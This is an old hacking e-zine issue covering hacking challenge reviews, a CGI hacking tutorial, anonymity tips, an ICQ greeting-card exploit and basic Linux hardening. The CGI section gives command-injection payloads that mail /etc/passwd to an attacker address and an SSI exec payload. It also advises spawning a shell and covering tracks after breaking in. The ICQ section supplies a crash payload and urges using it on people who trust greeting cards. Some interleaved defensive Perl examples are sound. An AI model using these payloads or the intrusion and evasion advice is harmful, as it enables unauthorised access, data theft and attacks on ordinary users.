Hack FAQ < Volume 7 > by Wang

Frequently asked questions about hacking and computers

Took a bit longer to get this volume out, been quite busy and updated a number of programs on the site. I have also been plugging away at the hacking challenges on the net - and starting on writing one myself for the Wang Products web site called "Mod-X". I had a couple of late requests for topics, so they haven't quite made it into this volume - but they will be written and included in Volume 8. Massive thanks must go out to Chawmp (General Chawmp of Cyberarmy) who wrote the Hacking CGI scripts topic below. Also, thanks to anyone else that has helped! Anyhow, enjoy :)

If you have any topics you want covering, please email me at Wang@most-wanted.com and I will consider putting them into the next volume, or you can fill in my online question form on the site. If you have any other methods of solving the questions that I have answered, please send them to me and I will consider putting your solution in as well (with full credit to you obviously).

If you want to join our mailing list and be notified as soon as a new Hack FAQ is released, you can sign up by clicking here


Topics covered


Hacking Challenges

Hacking used to be something which was difficult to learn, and even more difficult to practise safely. With the introduction of the Internet, this has changed. Hackers can now freely exchange their knowledge without risk of being identified, and make themselves known to other hackers/hacking groups. The Internet has brought Hackers together...and given birth to many new opportunities. Recently, a lot of hacking challenges have appeared on the net - most inspired by the hacking challenge at Cyberarmy.com - Zebulun. I thought it would be nice to take a look at a couple of the best ones I have found - and hopefully get some of you lot to try them!

Explanation of ratings

All Ratings are out of 10.

Design is the rating for how good the idea behind the challenge is, and how good the graphics/layout of the challenge is

Features is the rating for what extra bits you can do in the challenge - e.g. message boards to talk to other hackers, challenge statistics, user rankings, special level privileges etc.

Challenges covers how good the actual challenges are (surprisingly :) and how well thought out they are. I also take into consideration how many different aspects of hacking are covered, and in what depth.

Difficulty is rated on how hard the challenges are, and how hard they get as you progress.

Zebulun ( http://www.cyberarmy.com/zebulun )

The original. Zebulun is still respected as the 'main' hacking challenge. I am not sure how it came to be, but Zebulun seems to be THE challenge to prove yourself on. It has the biggest user database of all the challenges we are looking at, and consists of different levels, each with its own challenge. As you go up the levels in Zebulun you are awarded different ranks (e.g. Trooper, Captain etc.) and different privileges at each level, e.g. being able to administer lower-level message boards or to access other areas of the web site. The design of Zebulun is very slick, with nice simple layouts and loads of features. Each level has its own message board so you are able to talk with people on the same level, and improvements are constantly being made.

Challenges have been designed to test different aspects of hacking, and although there is one challenge per level - a challenge may require you to do a number of things. Challenges have been well designed to ensure that they are realistic enough for you to practise your skills on - but legally. For Zebulun, you will need to know a number of different topics, ranging from understanding basic javascript to finding and using exploits and encryption.

Design: 10

Features: 10

Challenges: 8

Difficulty: 8

Comments: Very professional, and packed full of features and level privileges. Challenges are nicely thought out, but in places not very taxing. Some may argue that it is not testing a hacker's ability at all, as it does not require the user to write a program of his own; in fact, little programming knowledge is required at all. Despite this, other areas are covered nicely.

Disavowed ( http://www.disavowed.net )

Disavowed takes a more hands on approach to the hacking challenge idea. There is no messing with 'ranks' or user registration. However...it comes out very nicely. The design is simple, and revolves around the idea that you are being initiated into joining a team of elite hackers. There are 3 stages - Easy, Medium, and Hard - each consists of 4 challenges. The 4 challenges on each stage are Java, Programming, Research, and Unix/www. At each stage you must complete the 4 challenges to proceed. After completing all 3 stages - you become a member of the team and the challenge changes to being far more complex!

Java looks at increasingly difficult javascript protections, for which you must find the password. This teaches you to recognise 'easy' ways of breaking javascript protections, and to realise that they are not secure enough to protect pages. Programming sets you the task of making a program (in any language you choose) to find the solution to a problem. These problems range from easy to damn hard, and even the best of programmers will find themselves having to think. Research is something which is pretty unique to disavowed.net: it requires you to find something out using the Internet. You will be given just enough information to get you started, and the rest will be up to your brain and your search engine of choice. Unix/www is designed to test your knowledge of unix and the Internet (surprisingly!), although possibly more the Internet than unix. Each stage also provides you with a message board to talk to others on the same level.

Design: 10

Features: 7

Challenges: 10

Difficulty: 10

Comments: Clever design using good imagery and a storyline to make you work towards 'joining the team'. Challenges are very difficult; without good programming/Internet experience you would not get through. Perhaps you could say there is less interaction than Zebulun, but it doesn't seem to matter. I feel it covers important aspects of hacking in great depth, and you will almost certainly come away having learnt something.

Arcanum ( http://www.arcanum.co.nz )

I have had a go at a number of small challenges that various people on Zebulun have made, and although some of them are quite fun, they never really make you want to go back. I thought that Trapper's challenge 'Arcanum' would be the same, but it surprised me. It is not complete yet (well, actually most of these challenges are still work in progress) but what I can see already is looking good. At the moment the design echoes Zebulun quite closely (colour schemes, fonts etc.) but I have a feeling it will develop its own feel later.

There are 5 levels at this point in time, and each level consists of 4 challenges. The 4 challenges at each level are Logic, Programming, Encryption, and Unknown. Logic challenges are basically brain teasers, or mental challenges. You are given a problem (usually mathematical) and asked to solve it. This is the only challenge that I feel is a little weak; I personally don't see the point in it, and so far I have treated it as a second programming challenge. The problem is that it is too easy to write a simple program to solve the logic problems (admittedly there was one that you actually had to work out because a program wouldn't do it, but that's not really enough). The programming challenges are nice: they start off easy and gradually get to a hard level which really makes you think! The encryption is also nice, again starting from ridiculously easy algorithms and moving to much more complex ones. Unknown, from what I have seen so far, is used to test your knowledge of many other aspects (like unix, www, cracking) and is a nice way to bring other aspects into the challenge. What is good about Arcanum is that you are awarded a star each time you complete a challenge on a level. On the members list you can then see how many challenges on each level people have completed, which is a nice touch. Arcanum also provides a message board at each level to communicate with users on the same level.

Design: 7

Features: 8

Challenges: 8

Difficulty: 7

Comments: A nice little challenge, I can see this one progressing into something bigger. This challenge is not complete and at present level 5 is just going up. I did feel that up until level 4 the challenges were very simple, and I did wonder if they were going to get better - but level 4/5 there seems to be a jump in the difficulty and things get quite interesting. A good start!


Hacking CGI Scripts ( Written for Hack FAQ by Chawmp )

***********************   by Chawmp (Tom McIntyre)
* - Hacking CGI   - *   homepage: http://home.cyberarmy.com/chawmp
* - Version 1.01c - *   email: tom@holodeck.f9.co.uk
***********************   ICQ: 2724168

Introduction
-------------------

CGI programs are a major source of security holes. On a typical site the server and config files may be secure, but if CGI programs are not meticulously checked before they are used then serious security flaws can often be uncovered.

If at any time you are having difficulty, see the Notes section near the bottom of this document.

CGI basics
========

The letters "CGI" stand for "Common Gateway Interface". CGI is a way to add flexibility to websites by providing a mechanism for programs to be executed on the server (sometimes with input from the user on the client side), and for their output to be displayed back to the client (or just logged somewhere on the server for later inspection). These programs can be written in any language, but by far the most common is perl. Perl is ideal for handling text-based input easily, so it's the language of choice for many CGI developers. In practice the term "CGI script" usually means a perl script.

What makes a CGI program dangerous?
================================

For example, there are several places where CGI programs are made available for free. If you downloaded a set of perl scripts from such a site you would probably expect them to be bug-free and install them without a second thought. There are also the problems of time and operator competence: most people don't have the time or the knowledge to go through a 5000-line bulletin board script to find the single vulnerable statement. This isn't limited to free scripts either; some very high-profile professional script packages have recently been found to be vulnerable to attack.

Preparation
==========

If you know what script a site is using and it's freely available, get it! By examining the code and playing with it on your own system you'll be able to find holes a lot more easily than by just guessing. And your failed attempts won't be noticed by the server administrator.

Methods of attack
==============

Insecure shell calls
------------------------------

This applies to CGI programs written in many languages, but most commonly perl. If the program does not treat user input carefully there is a risk that a malicious user may craft it to be processed by the program in a dangerous way.

Consider the classic vulnerable "mail" script, for example a feedback form. A website visitor is asked for comments that will be sent to the webmaster's email address by a script running on the server.

-- vuln1.html - The submission form --

<html>
Thank you for visiting my site. Please submit your comments and suggestions here:
<br>
<form action="/cgi-bin/vuln1.pl" method="GET">
<input type="hidden" name="address" value="webmaster@vulnerable.com">
<textarea name="comments" rows=10 cols=40></textarea>
<br>
<input type="submit">
</form>
</html>

-- EOF --

-- vuln1.pl - The vulnerable perl script --

#!/usr/bin/perl

# Output will be an html page
print "Content-type: text/html\n\n";

# Get input from form into the @pairs array
@pairs = split(/&/, $ENV{'QUERY_STRING'});

# For each name/value pair in the array
foreach $pair (@pairs) {
    # Split the pair into their own variables
    ($name, $value) = split(/=/, $pair);

    # Convert the form-encoding back
    $name =~ tr/+/ /;
    $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

    # Store the destination email address and comments in variables
    if ($name eq "address") {
        # Store the destination email address
        $address = $value;
    } elsif ($name eq "comments") {
        # Store the comments
        $comments = $value;
    }
}

# At this point $address holds the address specified on the form, and
# $comments holds the user's comments.

# --- "Active" part
# See discussion for details of this part
open(MAIL,"| /bin/mail $address");
print MAIL "$comments";
close(MAIL);
# --- End of "active" part

# Print output for the user
print <<EOT;
<html>
Thanks for your comments :)
</html>
EOT

-- EOF --

There are two files in the above example. The html file that takes the input from the user, and the vulnerable perl script. If you don't know perl then you don't need to try to understand how most of it works. Just know that the destination email address (as specified by a hidden form element in the html page) and the comments (from the textarea) are stored, and passed to the mail program inside the "active" part.

In perl the open function is used to open a file, or more importantly here, a pipe. In this case a pipe to the command "/bin/mail webmaster@vulnerable.com" is opened and the comments are written to it, causing them to be emailed to the webmaster.

Look at what's happening here. The "/bin/mail webmaster@vulnerable.com" command is produced by starting /bin/mail with the address specified by the html page. If a malicious user was to save a copy of the html locally, and modify it by changing the lines

<form action="/cgi-bin/vuln1.pl" method="GET">
<input type="hidden" name="address" value="webmaster@vulnerable.com">

to these:

<form action="http://www.vulnerable.com/cgi-bin/vuln1.pl" method="GET">
<input type="hidden" name="address" value="hacker@root.com">

The action must now contain the complete URL since the html no longer resides on the server, and the email address has been replaced with your own. Now the comments will be sent to your email address.

Now, what would happen if you were to change the email address part to this?

value="hacker@root.com;mail hacker@root.com < /etc/passwd"

Inside the script this email address would translate to the command

"/bin/mail hacker@root.com;mail hacker@root.com < /etc/passwd"

causing the password file to be mailed to your address :)

(Note: I use /etc/passwd in examples throughout this document, but it is only for example purposes. Nowadays this file has limited value to an intruder as on modern systems the passwd file will not contain the actual password hashes).

If you find that the script filters the ; character, you can always try the | character, or \n (a newline), as both of these also cause another command to be executed on the same line. Bear in mind that using | will cause the output of the first command to be fed into the second (which won't usually matter), and that to send a newline character over the web you must encode it as %0a. So the address part could now be

value="hacker@root.com%0amail hacker@root.com < /etc/passwd"
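The fix for this class of bug, as an added example that is not part of Chawmp's article: the "active" part of vuln1.pl rewritten so that nothing from the form can ever reach a shell. It assumes, like the original, that /bin/mail takes the recipient as its argument; the subroutine names are my own.

```perl
#!/usr/bin/perl -T
# Added example (not from the original article): the "active" part of
# vuln1.pl done safely. Assumed: /bin/mail takes the recipient as argv[1].
use strict;
use warnings;

# Taint mode (-T) makes perl refuse to pass data derived from %ENV or
# the query string to a command until it has been "untainted" through a
# regex capture. It also insists on a clean PATH before running anything.
$ENV{PATH} = '/bin:/usr/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Whitelist the address: only characters that belong in a plain mailbox
# name. Anything else (;  |  newline  <  >  spaces) is rejected outright,
# and the capture is what untaints the value.
sub untaint_address {
    my ($raw) = @_;
    return undef unless defined $raw;
    return $raw =~ /\A([A-Za-z0-9._%+-]+\@[A-Za-z0-9.-]+\.[A-Za-z]{2,})\z/
        ? $1 : undef;
}

# The original was:  open(MAIL, "| /bin/mail $address");
# That string form hands the whole line to /bin/sh, so ";", "|" and "\n"
# inside $address become command separators. The list form below execs
# /bin/mail directly with $clean as a single argv element; no shell ever
# parses it, so metacharacters are just part of the (rejected) address.
sub send_comments {
    my ($address, $comments) = @_;
    my $clean = untaint_address($address)
        or die "Refusing to mail to an invalid address\n";
    open(my $mail, '|-', '/bin/mail', $clean)
        or die "Cannot run /bin/mail: $!\n";
    print {$mail} $comments;
    close($mail) or die "mail exited with status " . ($? >> 8) . "\n";
    return 1;
}

# Self-check of the whitelist against the payloads discussed above
# (constructed here; the last three are the injection attempts).
for my $probe (
    'webmaster@vulnerable.com',
    'hacker@root.com;mail hacker@root.com < /etc/passwd',
    "hacker\@root.com\nmail hacker\@root.com < /etc/passwd",
    'hacker@root.com|mail hacker@root.com < /etc/passwd',
) {
    printf "%-52s -> %s\n", (split /\n/, $probe)[0],
        defined untaint_address($probe) ? 'accepted' : 'rejected';
}
```

Run it directly (so the #! line is honoured) or as `perl -T script.pl`; perl refuses to start a script whose #! line asks for -T if the command line did not also pass it. Only the first probe is accepted. The two changes that matter are the whitelist and the list-form open; either alone closes the hole shown above, together they also catch the next trick you have not thought of.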

Insecure use of SSI
-------------------------------

SSI means "Server Side Includes". These are instructions that can be placed in html files that are parsed by the server when the page is requested to give on-the-fly information. These pages are normally given the extension .shtml (or some shorter version), but this depends on the setup of the server. On some servers, all html documents are parsed. All includes take the form:

"<!--#"<tag><whitespace><parameters>[<whitespace>]"-->".

Here are some examples:

<!--#echo var="DATE_GMT" --> Prints the current date
<!--#include virtual="/ssi/header.html" --> Includes a common header section
<!--#exec cmd="uptime" --> Displays the system's uptime

There's a lot more you can do with SSI - take a look around on the net for more.

If you could add your own SSI to a file that is parsed by the webserver, you would be able to execute commands, include files, etc. Many CGI programs do not take this into account. Here's an example:

-- vuln2.shtml - A public comments page --

<html>
<!--#include virtual="/ssi/header.html" -->
Thank you for visiting my site. Please submit your comments and suggestions here:
<br>
<form action="/cgi-bin/vuln2.pl" method="GET">
<textarea name="comments" rows=10 cols=40></textarea>
<br>
<input type="submit">
</form>
<hr>
Here's what other people have had to say:
<hr>
<!--begin-->
<!--#include virtual="/ssi/footer.html" -->
</html>

-- EOF --

-- vuln2.pl - The vulnerable perl script --

#!/usr/bin/perl

# Define the location of the page to be updated
# Change this to the location of vuln2.shtml if you're trying this out
$pagename = "/home/web/html/vuln2.shtml";

# Print content-type header
print "Content-type: text/html\n\n";

# Get input from form into the @pairs array
@pairs = split(/&/, $ENV{'QUERY_STRING'});

# For each name/value pair in the array
foreach $pair (@pairs) {
    # Split the pair into their own variables
    ($name, $value) = split(/=/, $pair);

    # Convert the form-encoding back
    $name =~ tr/+/ /;
    $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

    # Store the comments in a variable
    if ($name eq "comments") {
        # Store the comments
        $comments = $value;
    }
}

# At this point $comments holds the user's comments.

# Separate each comment in the output file
$comments .= "\n<hr>\n";

# --- "Active" part
# Open the file for read/write
open(FILE,"+<$pagename") || (print("Cannot open file!\n") && exit);

# Lock the file to prevent other processes opening it
flock(FILE, 2);

# Read the file into the @list array
@list = <FILE>;

# Search through the array and insert the comments just before the
# <!--begin--> line
$linenum = 1;
foreach $line (@list) {
    if ($line =~ /^<!--begin-->/) {
        $linenum--;
        splice(@list, $linenum, 0, $comments);
        last;
    }
    $linenum++;
}

# Write the array back to the file
seek(FILE,0,0);
truncate(FILE,0);
foreach $line (@list) {
    print FILE $line;
}

# Close the file
close(FILE);
# --- End "active" part

# Print output for the user
print <<EOT;
<html>
Thanks for your comments. Click <a href="/vuln2.shtml">here</a> to return to the comments page :)
</html>
EOT

-- EOF --

These two files comprise a simple guestbook. You can see that the .shtml file uses SSI to display a common header and footer (using the include directive). When this file is sent to the browser the include directives will be replaced by the contents of the appropriate files. Note that the <!--begin--> in the .shtml file is merely marking where the next comment should be inserted. It should not be confused with an SSI directive, as these all start <!--#.

Since this is such a simple script it doesn't do any input validation. If this was a normal html page you would be able to insert html, including javascript, into the page. Because it's SSI-enabled, try entering something like the following in the comments box:

<!--#exec cmd="cat /etc/passwd" -->

Now, when you go back to the comments page you'll see the password file :)

(Note: The file will appear to be one long line - this is simply because html doesn't insert line breaks at newlines. Use your browser's "view source" function to get a more readable output).

This is ideal. However, some server admins disable the exec directive to prevent this type of attack. In this case the best you can do is use the include directive to include the contents of a file whose location you know, such as a password database file that is not available via the web with your current access rights, but still within the web root. Note that some files (such as CGI scripts) will not have their source included by using an include directive. From an intruder's point of view, the include directive has limited value, and without exec there isn't always much you can do.
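Two small routines a guestbook like vuln2.pl could call before writing visitor text into a server-parsed file, as an added example that is not code from the article. The subroutine names and the sample comment are mine; the sample reuses the exec payload from the text plus an include directive made up for illustration.

```perl
#!/usr/bin/perl
# Added example (not from the original article): detect and neutralise
# SSI directives in user-supplied text before it goes into a .shtml file.
use strict;
use warnings;

# Scanner: report every SSI directive in a block of text. Useful as a
# pre-write check and for auditing an existing .shtml that may already
# have been tampered with. The pattern is the directive grammar given in
# the text: "<!--#" tag whitespace parameters "-->". A plain HTML comment
# such as <!--begin--> has no "#" and is not matched.
sub find_ssi_directives {
    my ($text) = @_;
    my @found;
    while ($text =~ /<!--#\s*(\w+)\s*([^>]*?)\s*-->/g) {
        push @found, { tag => $1, params => $2 };
    }
    return @found;
}

# Neutraliser: HTML-escape the characters that can form a directive (or
# any other markup). Once "<" is "&lt;" the server cannot see "<!--#",
# so the browser shows the comment as literal text instead of the server
# executing it. In vuln2.pl this belongs right before "$comments .= ...".
sub escape_html {
    my ($text) = @_;
    $text =~ s/&/&amp;/g;
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    $text =~ s/"/&quot;/g;
    return $text;
}

# Constructed sample comment: the exec payload from the text, an include
# directive (made up for illustration) and a harmless HTML comment.
my $comment = join "\n",
    'Nice site!',
    '<!--#exec cmd="cat /etc/passwd" -->',
    '<!--#include virtual="/private/users.db" -->',
    '<!--begin-->';

my @hits = find_ssi_directives($comment);
printf "%d directive(s) found: %s\n", scalar @hits,
    join(', ', map { "$_->{tag} $_->{params}" } @hits);

my $safe = escape_html($comment);
printf "after escaping: %d directive(s) found\n",
    scalar find_ssi_directives($safe);
```

The scanner reports two directives (exec and include) in the raw comment and none after escaping. Escaping is the minimal patch; the structural fix is not to write visitor text into an SSI-parsed file at all, but to keep comments in a data file and have the script render them (escaped) when the page is requested.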

Buffer overflow
------------------------

This applies to CGI programs written in languages such as C. If the program does not validate its input properly a malicious user could overflow a buffer in the program to execute arbitrary code on the server. Since buffer overflows are beyond the scope of this article I won't go into any more detail, but information on this kind of attack is available to anyone who searches for it. A good article to read to get started with buffer overflows is "Smashing The Stack For Fun And Profit" in Phrack 49. Look it up. :)

What to do once you're in
=====================

First of all, don't pull an rm -Rf / . If you take note of anything I say, it should be that damaging sites is lame. Other than that, you have to make the decision whether what you're about to do is reasonable or not. Remember, unless you know what you're doing (which you probably don't since you're reading this) and you try anything stupid you'll get caught. One thing you might want to do is report the vulnerability. Mail the server admin and let them know - if they're a reasonable person they'll fix the hole, and you'll make a new friend :) If the hole is in a widely-distributed CGI program, report it to the creators so that it can be fixed for future versions, and current users can be warned.

Presumably you're trying to break into the site for a reason: to get access to files, etc. Do what you want and come back out, and if you don't want to get noticed, clean up after yourself. In the above example, instead of just dumping the password file (assuming that was your target file) into the page for everyone to see, you could write a bit of perl to spawn a shell on the server, or provide a form interface in another file for easy access to further commands. After setting up something like this, put the original file back the way you found it, and chances are you won't get noticed for a good while longer.

Notes
=====

In this document I use UNIX-style path and filenames. Most of the ideas I've discussed here work exactly the same under NT and other platforms, it's just that I wrote these examples on a Linux system.

When you execute commands on the system, you do so with the rights of the user/ group the webserver runs as, which is usually nobody/nobody. This is enough access for complete control over the files the webserver uses though.

I use perl scripts here for example purposes. If you don't know perl you only really need to pay attention to the sections marked '"active" part', as these are the sections that contain the vulnerable code.

If you're testing these files out for yourself, make sure you set the file/pathnames correctly, remember to chmod your cgi scripts 755 so that they are executable, and check that the first line of each script gives the correct path to perl on your system. Also, in the SSI example, vuln2.shtml must be writable by the user the webserver runs as, since the script writes to it. chmod 666 is enough (it needs to be writable, not executable); a world-writable file under the web root is, of course, exactly the sort of thing an intruder looks for.

These scripts are just simple examples. Sometimes you have to do a little more work than this to get around filters, etc, but often it is possible. Experiment.

For more info email or ICQ me (details at the top), or drop by my website to see if this file has been updated.

Further information
================

There are a few articles out there. p41mit0 recommended this one:

http://www.phreedom.org/en/issues/Phm23%20-%20Jordan%20Dimov%20-%20Security%20Issues%20in%20Perl%20Scripts.txt

Greets
=====

Everyone in the CyberArmy - there are too many to mention :)

http://www.cyberarmy.com/zebulun - Come try our officers' challenge

EOF


Basics of remaining anonymous on the net

The Internet is a realm of information. Anyone can go online and find out about any subject that interests them...but how much can they find out about you?

The answer: more than you would think! Let's take a normal example. A friend sends you the address of a web site to go to, say www.example.com, and you go there. Now, the owner of www.example.com can look in his server logs and, if he wanted to, determine the following things about you:

For proof that this is possible, go to http://www.anonymizer.com and look at what they know about you already! Visiting a web site is not the only way someone can get information about you though. Every time you are on IRC, ICQ, AIM, online gaming, email etc. you are giving away more information about yourself.

How is this possible??

Well, your computer is making a connection with the web site, right? So for that web site to send you anything, it needs to know your IP address. Bang! It has your IP, which it can then resolve to a hostname to see what ISP you are with.

The site wants information like your browser name and version and your operating system so that it knows how to display the page correctly for you. For example, some sites look very different in Netscape and Internet Exploder, so sometimes the site will have two versions, one for each. Your browser announces its name, version and operating system in the User-Agent header of every request it makes, so the site reads that and serves the right version. Extras such as your screen resolution are not in the request at all; a page gets those by running JavaScript in your browser. Useful, huh? Well, the problem is that any site gets that information simply because it wants to know more about you :)

Java/javascript also has commands and functions that will find out information about you, and cookies are a wealth of information to the web site owner.

Don't forget browser holes and exploits as well - if your outdated browser has an exploit, they may be able to exploit it and get more information.

What can I do to stop them finding out this information??

There are many different levels you can take this to...we will start off simple, and get more paranoid :)

Proxies

Ok, so proxies aren't strictly for making you more anonymous, but they do. Proxies are meant to speed up your Internet connections. If you need to contact some site on the other side of the world, you will probably find it is a bit slow. So instead you use a proxy. Your web request goes to the proxy (which will hopefully be located a bit closer to home, so try to pick a proxy in your own country), which checks its cache to see if any of its other users have fetched that page recently. If they have, it can make a quick conditional request to the site (asking whether the page has changed since the cached copy was fetched) and, if it hasn't, send you the cached copy. All that should take less time than fetching the page yourself. So how do proxy servers anonymise you? Well, think about it: do you actually make any contact with the web site? No, the proxy does it all for you. The site's logs therefore show the proxy's IP address, not yours. There are exceptions, as some proxies aren't completely anonymous and pass your details across to the site in extra request headers (X-Forwarded-For carrying your IP, or Via naming the proxy). The way to check is to use the proxy to visit a test page like the one at www.anonymizer.com or www.cyberarmy.com/lists/ and see whether it comes up with your details or the proxy server's.

To get a proxy, you can either:

Also, there are different kinds of proxies for different kinds of Internet activity. For example, you can get HTTP proxies for web browsing, FTP proxies for accessing FTP servers, Socks proxies for telnet and IRC etc. etc.

These different proxies usually listen on different ports. HTTP proxies are usually on something like 8080, 3128, 8000 or 80, and SOCKS proxies on 1080.

To use a proxy in Netscape:

Go to: Edit - Preferences - Advanced - Proxies - Manual proxy configuration - View

Then type in the name and port number of your proxy.

To use a proxy in IE:

Go to: View - Internet Options - Connection - mark "Access the Internet using a proxy server".

At ADDRESS type the name of the server and at PORT type the port number, click on advanced button and mark "Use the same proxy server for all protocols".
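A minimal version of the kind of test page referred to above, as an added example (not from the original text, and not the code behind any of the sites named): a CGI that prints what the server sees and judges, from the headers a proxy adds, whether your real address is being forwarded. The verdict labels are mine; the environment variable names are the standard CGI ones.

```perl
#!/usr/bin/perl
# Added example: a "what does the site see" CGI page that also judges how
# anonymous an intervening proxy is. Only standard CGI environment
# variables are read; the verdict wording is my own.
use strict;
use warnings;

# Return the first argument unless it is missing/empty, else the fallback.
sub val { defined $_[0] && $_[0] ne '' ? $_[0] : $_[1] }

# Headers a proxy may add on your behalf: X-Forwarded-For carries the
# client's real IP, Via names the proxy. A browser on a direct connection
# sends neither, so their presence is what gives a proxy (and you) away.
sub classify_proxy {
    my ($env) = @_;
    my $xff = $env->{HTTP_X_FORWARDED_FOR};
    my $via = $env->{HTTP_VIA};
    return "transparent: forwards your real address ($xff)"
        if defined $xff && $xff ne '';
    return "anonymous: hides your address but announces itself ($via)"
        if defined $via && $via ne '';
    return "none visible: direct connection, or a proxy that adds no headers";
}

print "Content-type: text/plain\n\n";
print "Connecting address (REMOTE_ADDR): ", val($ENV{REMOTE_ADDR}, '?'), "\n";
print "Browser (User-Agent):              ", val($ENV{HTTP_USER_AGENT}, '?'), "\n";
print "Page you came from (Referer):      ", val($ENV{HTTP_REFERER}, '(none)'), "\n";
for my $h (qw(HTTP_X_FORWARDED_FOR HTTP_VIA HTTP_FORWARDED HTTP_CLIENT_IP)) {
    print "$h: $ENV{$h}\n" if defined $ENV{$h};
}
print "Proxy verdict: ", classify_proxy(\%ENV), "\n";
```

Drop it in cgi-bin, chmod 755, and visit it once directly and once through the proxy you are evaluating. If REMOTE_ADDR changes to the proxy's address and the verdict is "none visible", the proxy is doing what you wanted; "transparent" means the site still learns your IP and the proxy has bought you nothing.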

Encryption

If someone ever hacks your computer over the net, or hacks your email, they are going to be able to go through your private information. Encryption is a way of making your private files and emails unreadable to anyone who doesn't have the key. Obviously, some ciphers are trivial and can be cracked in minutes (Caesar shifts, XOR with a short repeated key, character substitutions etc.). However, there are ciphers out there that are very, very strong, and your average script kiddie who breaks into your mail will not have a chance in hell of decrypting it.

For example, there is an encryption program on the site ( http://www.wangproducts.co.uk ) called Wcrypt; there is a DOS version and a Windows version, and you can use it to encrypt your files. It uses the strong Blowfish cipher. There are also encryption systems written with email in mind. PGP was described in Hack FAQ 1. PGP is a public-key system: it allows people to send you encrypted emails which only you (the holder of the private key) can decrypt. http://www.pgpi.com

Web based email accounts

Generally, web based email is good to use. You can sign up for a web based email account, and you don't really need to give them any personal details. http://www.hotmail.com is an example of a web based email service.

Ever been to http://www.hushmail.com ? They are an anonymous web based mail service, and they offer very strong email encryption as well. Basically, when you use your hushmail account to send a mail, your IP address is not included in the email headers (see Hack FAQ 2 for a description of email headers), which means that the receiver of the mail can't trace you back to your ISP; they can only trace you back to hushmail. Hushmail say they do not keep any details about you, so to the recipient you are effectively anonymous. Bear in mind that the service itself still sees the address you connect from, so combine it with a proxy if that matters to you. Also, the service is quite nice :)

Anonymous Remailers

When you use an anonymous remailer to send an email, the idea is that the email should not be traced back to you. Basically, your computer sends a mail to the remailer, and then the remailer sends the mail on to the recipient. In this process, your details are taken out of the email so it will not be traced back to you. It is also possible to send the email through multiple remailers. A typical (although each remailer may be different) email might be:

From: you@you.com
To: remailer@anonymous.com
Subject: This will be anonymous
::
Anon-To: recipient@recipient.com
blah blah blah

That would send an email from you@you.com through the remailer at remailer@anonymous.com to recipient@recipient.com . Don't forget the "::" - that tells the remailer that the Anon-To part is an address and not part of your message.

I can't really give you the names of any remailers as they go up and down all the time. However, if you do a search in a good search engine you are bound to find a few good ones.

Cookies

You may have heard people ranting about cookies, but what are they?, and why might you not want them?

When you visit a web site, it is entirely possible that the site could place a cookie on your computer. A cookie is basically a piece of information, stored in a file on your computer. These files are referred to as cookies, or cookie files. Basically, the site can put whatever it wants in the cookie, and then read the cookie again when you next go back to the site.

Why do this, you ask? Well, it's simply for convenience. Ever logged into a web based email service and then found that next time you go back there it automatically has your login name entered for you? Or ever been to a web site which actually tells you how many times you have visited the page before? The site knows this because the information was stored on your computer. Netscape and IE both have facilities for cookies, and in both browsers you can turn cookies off in the options. However, you will suddenly realise how many web sites use cookies, and how many web sites get annoyed when they can't use cookies on you.

It may also be worth mentioning that some cookies are only present for the time that you have the browser open - these are generally used for security purposes, like when you login to your web based email, then go to another site, and then go back to your mail - it might want to check the cookie to make sure you are the same computer that accessed the mail a short while ago. So think carefully before turning cookies off. I also believe that IE (and I think Netscape?) has the facility to ask you whether or not to accept the cookie each time a site tries to use one on you.

I am really paranoid - what can I do?

Ok - so you want to take it a stage further? Well, this is actually a good idea anyway. Here we go:


ICQ and HTML/Java fun

Just a really quick topic to keep along the lines of what we have already mentioned in this volume. HTML and java can be used for many evil purposes, and as a result of this - a lot of companies/programs filter html and java out of their products so that no-one can exploit them. For example, a number of message boards on the Internet filter java code from your message posts - why? because if they didn't, anyone could open a message and have some vicious java executed on them.

I thought ICQ would be a good program to talk about because another non-filtered html/java exploit has been uncovered in ICQ recently. ICQ provides its users with a "Greetings card" facility. This allows you to click on someone in your contact list, and send them a greetings card (for whatever reason). Recently, it was found that you can include html/java code in a greetings card message - and ICQ doesn't filter it out. This means that when the recipient opens his greetings card, the html/java code will be executed...not the kind of greeting you were expecting!

For example:

Sending a greetings card with the following text in it will crash the recipient's computer (if they are using Windows 95/98):

<meta http-equiv="refresh" content="0; url=file://c:/con/con">

Basically the html meta tag above tells ICQ to redirect you to c:\con\con - which will crash a windows 95/98 machine. Alternatively, if you are getting bored of the con/con bug - you could use file://c:/aux/aux to make it more interesting for yourself :)

There are millions of nasty things you could do with html and java at your disposal - but I will leave that to you! I will also say that this exploit is not very well known so not many people will be suspicious of a greetings card - and also, a lot of people will have never received one before and are therefore bound to open it.


Basics of securing Linux

This is just a really basic topic that I thought needed covering. A few people have contacted me asking about Linux security. It's very difficult: you want to install Linux and get going with it - but by just installing it and going on the net...you are open to attack from hackers. And let's face it, one of the reasons for using Linux is to improve your security. To be even close to secure, you will need to know all the exploit history for your Linux distro, and have the patches for all of them. This does not cover securing a machine that is on a network. As a rule, no machine should be placed on any network prior to its having been secured against local and remote attacks. Quite a lot of this info was researched from other articles on securing Linux from the net.

Firstly...the securing of your Linux box should take place straight after installation - and definitely before you go on the net for the first time.

Step 1 - Basic file permissions

Set more restrictive permissions on /root and /var/log

chmod -R og-rx /root
chmod -R o-rx /var/log
ulimit -c 0
/bin/touch /root/.rhosts /root/.netrc /etc/hosts.equiv
/bin/chmod 0 /root/.rhosts /root/.netrc /etc/hosts.equiv

Step 2 - Shut down services which are not required

This is very important. Services open ports on your computer - and open ports are potential ways for a hacker to penetrate your system.

The first thing to take a look at is the /etc/inetd.conf file. Most TCP and UDP services are initialized from this file.

-- sample inetd.conf section --

ftp     stream  tcp     nowait  root    /usr/libexec/ftpd       ftpd -l
#telnet stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
#shell  stream  tcp     nowait  root    /usr/libexec/rshd       rshd
#login  stream  tcp     nowait  root    /usr/libexec/rlogind    rlogind

-- sample inetd.conf section --

Any services preceded by a "#" are taken as commented out and will not be started at boot time.

